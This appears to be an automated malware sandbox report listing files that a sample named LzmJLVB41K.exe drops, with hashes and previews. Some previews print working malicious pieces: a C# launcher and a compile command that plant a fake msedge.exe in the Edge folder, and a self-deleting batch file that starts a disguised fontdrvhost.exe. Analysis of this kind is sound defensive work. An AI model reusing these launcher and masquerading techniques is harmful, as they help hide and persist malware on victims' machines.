                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fozAQGvSmfTQIywuzSgk.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                Malicious:false
                                                                                                                Preview:@...e................................................@..........

                                                                                                                C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):398
                                                                                                                Entropy (8bit):5.046787756052235
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLKwPkSiFkD:JNVQIbSfhWLzIiFkMSfhX8DFkD
                                                                                                                MD5:BD6CC936C61D3B61D0D285C1DDCA0249
                                                                                                                SHA1:83531DA32C8E0072C4FC6FB8A1E010A918C55BEF
                                                                                                                SHA-256:47591028AE6A9BAEEF2CDD849A226ADC801AFE3E0127965D52B17241DC7695C6
                                                                                                                SHA-512:ABA95583D827B6E14B0C2BA0A36C57D84787B06A98039113A47222B3693CCF5EB5A2DC67888289EC982A909F80D7E95A52585F939CBE7DBE71AB9A061E65C2A5
                                                                                                                Malicious:false
                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"); } catch { } }).Start();. }.}.

                                                                                                                C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):268
                                                                                                                Entropy (8bit):5.109818860536846
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fzq49:Hu7L//TRRzscQnabF
                                                                                                                MD5:DC466C6A01D0752F79AACA68E953F314
                                                                                                                SHA1:4987E272355A0EA48C9ADA779DBC4F27BDAD584F
                                                                                                                SHA-256:452EB631D75C559F9A6217B443BE018571DED38BBC1F12C31D98BBD1CE93C3D6
                                                                                                                SHA-512:7978B54887DEF35783FB69A8D83CADA0073580117EC1F08BC08AE8D9CA5D4ECB048E69A96DF78C01C9DC07B7BD88A9B2B18D6F98705745463AB1FCB1F4118F91
                                                                                                                Malicious:true
                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs"

                                                                                                                C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.out

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with CRLF, CR line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):771
                                                                                                                Entropy (8bit):5.232800500161943
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:KOuI/un/VRzstnabgKax5DqBVKVrdFAMBJTH:yN/VRzPbgK2DcVKdBJj
                                                                                                                MD5:7A48A9C5BAC4CD2C18231BA90C524E36
                                                                                                                SHA1:F934F42C31194A31286D4E15ACD44D8782F23A3A
                                                                                                                SHA-256:9A47CADC3FDF9AD76B87A69C8B3642D27E57BD407C9C97CD7F87FA89074E9BF4
                                                                                                                SHA-512:D2327F708C1F8B1B6408BF8E360BC5F3E0297BAA6C2F5EEF1E6AEBE573CCCEF42D8C8BA037040E1CC0D24FCDCEFD530D8870B30C6D453881BDB5B7BB6BEFBAD5
                                                                                                                Malicious:false
                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                C:\Users\user\AppData\Local\Temp\CWofdp6gFk

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):25
                                                                                                                Entropy (8bit):4.323856189774723
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:qOIPUHon:Ueon
                                                                                                                MD5:D71252C3ADB5492C3451AA782E666C25
                                                                                                                SHA1:16C4BEC6FBF9CD59702C9AA69927B3C427DCF690
                                                                                                                SHA-256:C719E7F55E5BB27F531E9ABC01135C3E34A02AC8198353D91F08ED7ABC17F86F
                                                                                                                SHA-512:932B2DCDF3536BC789DDB56DE99C01255F4895C08959B1F49D35F78F28F56076E028CEF7D631845565B26D0D343569154FCC995470E7853303CD235FED2BBBD8
                                                                                                                Malicious:false
                                                                                                                Preview:SIXdwkDvaxh1bn6CmSgk0IT18

                                                                                                                C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):193
                                                                                                                Entropy (8bit):5.159385433581279
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:hCRLuVFOOr+DED+Ybd2DGKOZG1N723fNOEhn:CuVEOCDED+sdSa19
                                                                                                                MD5:90F67FD3A57490E6B853EA311B2B6004
                                                                                                                SHA1:C048BB20D7772DECCCED2A187B8A8F4782E626F6
                                                                                                                SHA-256:CDF98F4056D9AD2E4C569BE3C9A345657B0C3A310BA322A8004C6DACAC6376D8
                                                                                                                SHA-512:0FBF745114B9F8988FFC9A16FA065EA89941A1E91A5002CFD811E74BA69635E049B14B01B2E08E65628B086A8DB5CD6D0A490F4FBD4CA96E42875BE363197D5C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Kg1DnkFEGg.bat"

                                                                                                                C:\Users\user\AppData\Local\Temp\RES6584.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Mon Nov 18 09:39:04 2024, 1st section name ".debug$S"
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1932
                                                                                                                Entropy (8bit):4.600158688081864
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:H/EfW9JLzFfLBtbaHwhwKKjmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+5gcN:iaLzJC/KMmslmuulB+hnqXSfbNtmh5N
                                                                                                                MD5:4924E2745D26EC216DB839837FB6F637
                                                                                                                SHA1:A9E8EA1491CDDC49E8B58A52DD3FDE1D5D0829D5
                                                                                                                SHA-256:D9AB477684740B3783E84ACD3011F4245D9B7B35E4C97E38CDF7446FE3EA2FC8
                                                                                                                SHA-512:8B7AD0FBFF33BF8339091699FFB59BA06746E2316768B90B939FDE527B89CF74D15CE49054FC3AB8AFC790FECD0F8F4DCAE43B69FC3A538B1B0C06272F9FB99D
                                                                                                                Malicious:false
                                                                                                                Preview:L...8.;g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RES6584.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

                                                                                                                C:\Users\user\AppData\Local\Temp\RES6A18.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Mon Nov 18 09:39:05 2024, 1st section name ".debug$S"
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1956
                                                                                                                Entropy (8bit):4.556498128432225
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:HrO9GXOhtbaHxfwKKjmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:EimKMmEluOulajfqXSfbNtmh1Z
                                                                                                                MD5:8E8FADD1BF0379638FBF7FA2E95FDBB7
                                                                                                                SHA1:7E901AA9D3BE06EDC0D1EF281A06F7AC1D079B5C
                                                                                                                SHA-256:700F6EF192C5319573556CF0EDF711547719D693BB02D07F971DDF5550A5643F
                                                                                                                SHA-512:805C5C926EEDA2801F898F18D26053EBE6CC21D0F43B8185173A1E1585D6C02DEAE3D4BA4AF0E1FA0D906D14A92704A5AD7BC6CFFE5CED274B9E6FC5C9A0D8DB
                                                                                                                Malicious:false
                                                                                                                Preview:L...9.;g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RES6A18.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10umto2j.tjr.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44n0pquz.j4d.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4agdnu2n.ybb.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vvtsvm0.qyl.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2bbyint.orc.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3hnwbed.4md.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dijagtgc.j2m.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecbrxnyj.pzy.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gt44czqn.k2h.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3trxai1.rd4.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqebmu1o.np4.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf10f0nt.zwt.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1p43c5p.epz.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me1wpws2.tc3.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
